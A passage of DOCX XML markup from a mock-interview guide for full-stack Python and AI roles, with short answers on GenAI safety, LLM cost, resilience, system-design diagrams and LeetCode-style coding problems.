        <w:t>Scenario/GenAI Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat all user input and retrieved text as untrusted. Enforce authorization before retrieval, isolate tenants, keep system instructions separate, filter retrieved documents by permission, and never put secrets or hidden policies in retrievable content. Add prompt-injection classifiers or rules, tool allowlists, output checks, refusal behavior, and audit logs. Monitor blocked attempts, unusual retrieval patterns, sensitive-document access, and user reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Scenario: Your LLM API cost increases 5x after adding a new AI feature. How would you investigate and optimize cost without hurting quality?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/GenAI Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break cost down by feature, tenant, model, prompt version, token input/output, retrieval size, retries, and cache hit rate. Find whether prompt length, context size, traffic, model choice, or repeated queries caused the spike. Optimize with shorter prompts, smaller models for simple tasks, response length limits, semantic caching, better retrieval top-k, batching where possible, rate limits, and quality evaluations before changing models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Scenario: A third-party payment or email API is unreliable. How would you design retries, fallbacks, idempotency, and user experience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set strict timeouts and retry transient failures with exponential backoff and jitter. Use idempotency keys so repeated requests do not double charge or duplicate messages. Put operations on a durable queue when user-facing latency should not wait for the provider. Add provider-specific circuit breakers, dead-letter queues, status tracking, reconciliation jobs, and user messages that are honest: pending, retrying, failed, or completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Scenario: A background worker pipeline falls behind and queue depth keeps growing. How would you debug and redesign it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Data Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check arrival rate versus processing rate, worker errors, retry storms, poison messages, dependency latency, CPU/memory, DB locks, and queue visibility timeout. Short term, scale workers, pause noisy producers, and isolate poison messages. Long term, partition queues by priority, add backpressure/rate limits, improve task idempotency, batch safe operations, tune concurrency, autoscale on queue age, and add dead-letter handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Scenario: You need to migrate a monolithic Django app to services without stopping product delivery. What migration plan would you propose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with a modular monolith cleanup: clear boundaries, domain ownership, tests, and observability. Choose one low-risk bounded context, expose APIs/events, and use the strangler pattern to route that capability to a new service while the monolith still runs. Keep shared database changes careful, prefer backward-compatible contracts, migrate data incrementally, and use feature flags. Avoid splitting everything at once; measure reliability and team velocity after each extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Scenario: You are asked to review a proposed full-stack AI application before launch. What risks, tradeoffs, and readiness checks would you cover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review functional requirements, data flow, auth, tenant isolation, threat model, PII handling, model/provider choice, RAG quality, prompt injection risk, cost controls, latency SLOs, fallback behavior, observability, evals, CI/CD, rollback, database migrations, capacity, and incident runbooks. Ask what can fail, who is impacted, how it is detected, how it is mitigated, and what evidence proves the system is ready for production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 57 - Diagram-Based System Design Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Draw and explain a high-level architecture diagram for a full-stack Python application with React, FastAPI, PostgreSQL, Redis, workers, and object storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Show Browser/React -&gt; CDN or frontend hosting -&gt; API Gateway/Ingress -&gt; FastAPI -&gt; PostgreSQL, Redis, Object Storage, and Queue -&gt; Worker. Explain synchronous request paths separately from async processing. Label auth, secrets, observability, autoscaling, backups, and failure points. A simple diagram can use boxes for services and arrows for data flow, with Redis for cache/session/rate limit and workers for slow jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Draw the request flow for user login from browser to backend, database, token/session creation, and frontend state update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Browser -&gt; Login API -&gt; User table/password verification -&gt; session/JWT creation -&gt; secure cookie or token response -&gt; frontend state update -&gt; protected API call. Mention password hashing, rate limiting, MFA if needed, CSRF for cookie auth, refresh-token rotation, audit logging, and server-side authorization on every protected request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Draw a file upload and async processing architecture using signed URLs, object storage, a queue, workers, and status tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Upload Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Browser -&gt; API creates upload record -&gt; API returns signed URL -&gt; Browser uploads to object storage -&gt; storage event/finalize call -&gt; queue -&gt; worker -&gt; status table -&gt; frontend polls or receives updates. Explain why large files should bypass the API, and include validation, virus scanning, retries, dead-letter queue, encryption, and access control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Draw a RAG architecture diagram showing document ingestion, chunking, embeddings, vector database, retrieval, prompt construction, LLM call, and citations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw ingestion flow and query flow separately. Ingestion: documents -&gt; parser -&gt; chunks -&gt; embeddings -&gt; vector DB with metadata. Query: user question -&gt; embedding -&gt; vector search/filter -&gt; retrieved chunks -&gt; prompt builder -&gt; LLM -&gt; answer with citations. Add permissions, freshness, evaluation, logging, token cost, and feedback loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Draw a CI/CD pipeline diagram for a Python full-stack app from pull request to production deployment and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw PR -&gt; lint/test/security scan -&gt; build frontend/backend images -&gt; push registry -&gt; deploy staging -&gt; smoke tests -&gt; approval -&gt; production rollout -&gt; monitor -&gt; rollback. Include database migration checks, artifact promotion, image scanning, environment config, deployment markers, feature flags, and rollback to the previous image or revision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Draw a Kubernetes deployment diagram for frontend, backend API, worker, Redis, managed PostgreSQL, ingress, secrets, and autoscaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Ingress/TLS -&gt; frontend Service and backend Service -&gt; backend Deployment -&gt; Redis/managed cache, managed PostgreSQL, object storage, and queue -&gt; worker Deployment. Add ConfigMaps, Secrets, ServiceAccounts, HPA, readiness/liveness probes, network policies, and observability sidecars/agents if used. Prefer managed databases over running PostgreSQL in the app namespace for production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Draw an observability diagram showing metrics, logs, traces, dashboards, alerts, and incident response flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw application services emitting logs, metrics, and traces to collectors/agents, then to monitoring/logging/tracing backends. Dashboards read from telemetry stores, monitors trigger alerts, alerts route to Slack/PagerDuty, and runbooks guide responders. Include correlation IDs, deployment markers, SLO dashboards, and feedback from incidents into backlog improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Draw a sequence diagram for a user asking an AI assistant a question and receiving a streamed answer with citations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Show User -&gt; Frontend -&gt; Chat API -&gt; Retriever -&gt; Vector DB -&gt; Prompt Builder -&gt; LLM -&gt; streaming response -&gt; Frontend. Also show metadata logging, citation lookup, safety checks before and after generation, and feedback capture. In a sequence diagram, order matters: retrieval happens before prompt construction, and streaming begins after the LLM starts producing tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Draw a failure-handling diagram for an unreliable third-party API using retries, queues, idempotency keys, dead-letter queues, and reconciliation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw API request -&gt; durable job queue -&gt; worker -&gt; third-party API. On transient failure, retry with backoff and jitter. On repeated failure, send to dead-letter queue and mark status failed/pending. Use idempotency keys to prevent duplicate side effects, and add reconciliation jobs to compare local state with provider state. Show user-visible statuses like pending, completed, or failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Draw a multi-tenant SaaS security diagram showing auth, tenant isolation, database scoping, cache scoping, audit logs, and admin access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw identity provider -&gt; backend auth middleware -&gt; tenant resolver -&gt; policy checks -&gt; database queries scoped by tenant_id or row-level security. Show cache keys containing tenant scope, object storage paths scoped by tenant, audit logs for sensitive actions, and admin access through separate privileged workflows. Emphasize that tenant isolation must be enforced server-side, not only in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Draw how the architecture changes when traffic grows from 1,000 users to 1 million users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Scaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with one frontend, API, database, cache, and worker. At higher scale add CDN, load balancer, horizontal API replicas, Redis cache, async queues, read replicas, database indexes/partitioning, autoscaling workers, object storage, rate limiting, observability, and SLOs. Explain each change as solving a bottleneck, not as adding complexity by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. In a system design interview, how do you present a diagram clearly while explaining tradeoffs, bottlenecks, and failure modes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Interview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with requirements and scale, then draw the main user flow left to right. Keep boxes high-level first, then zoom into storage, async jobs, caching, security, and observability. Label data stores and protocols, explain why each component exists, call out bottlenecks and failure modes, and discuss tradeoffs such as consistency vs availability, cost vs latency, and build vs managed service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 58 - LeetCode and HackerRank Style Python Practice Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Practice problem: Given an array of integers and a target, return indices of two numbers that add up to the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Arrays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary mapping value to index. For each number, compute complement = target - value and check if complement is already seen. If yes, return the two indices; otherwise store the current value and index. Time complexity is O(n), space complexity is O(n). Test duplicates, negative numbers, and no-solution behavior if the prompt allows it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Practice problem: Given a string, find the first non-repeating character.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count characters with collections.Counter or a dictionary, then scan the string again and return the first character whose count is 1. This preserves order and is O(n) time with O(k) space where k is the number of distinct characters. Clarify whether spaces, case, and punctuation count.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Practice problem: Group a list of words into anagram groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary where the key is either sorted(word) or a 26-count tuple for lowercase English letters. Append each word to the group for that key. Sorting is simple and costs O(m log m) per word; count tuples can be O(m). Return the dictionary values as groups. Clarify case sensitivity and character set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Practice problem: Find the maximum sum of any subarray of size k.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a fixed-size sliding window. Sum the first k elements, then slide one step at a time by adding the new right element and subtracting the old left element, tracking the maximum. This is O(n) time and O(1) extra space. Validate k &lt;= len(nums) and behavior for negative numbers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Practice problem: Given a sorted array, remove duplicates in place and return the new length.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Two Pointers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use two pointers. Keep write at the position for the next unique value, scan read from left to right, and copy nums[read] to nums[write] when it differs from the previous unique value. Return write. Time is O(n), space is O(1). This pattern is common for in-place array compaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Practice problem: Validate whether a string containing brackets is balanced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a stack for opening brackets and a map from closing to opening brackets. Push opens. For each close, the stack must be non-empty and top must match; otherwise return false. At the end, return true only if the stack is empty. Time O(n), space O(n).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Practice problem: Implement a moving average over the last k values in a stream.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Queue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use collections.deque to store the last k values and keep a running sum. On each new value, append it and add to sum; if size exceeds k, popleft and subtract. The average is sum divided by current window size. Each operation is O(1). Avoid recomputing sum over the full window every time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Practice problem: Reverse a singly linked list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Linked List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use three pointers: prev = None, curr = head, and next_node. Iterate while curr exists: save curr.next, set curr.next = prev, move prev to curr, and curr to next_node. Return prev as the new head. Time O(n), space O(1). Also mention a recursive version but iterative is safer for Python recursion limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Practice problem: Search for a target in a sorted rotated array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Binary Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
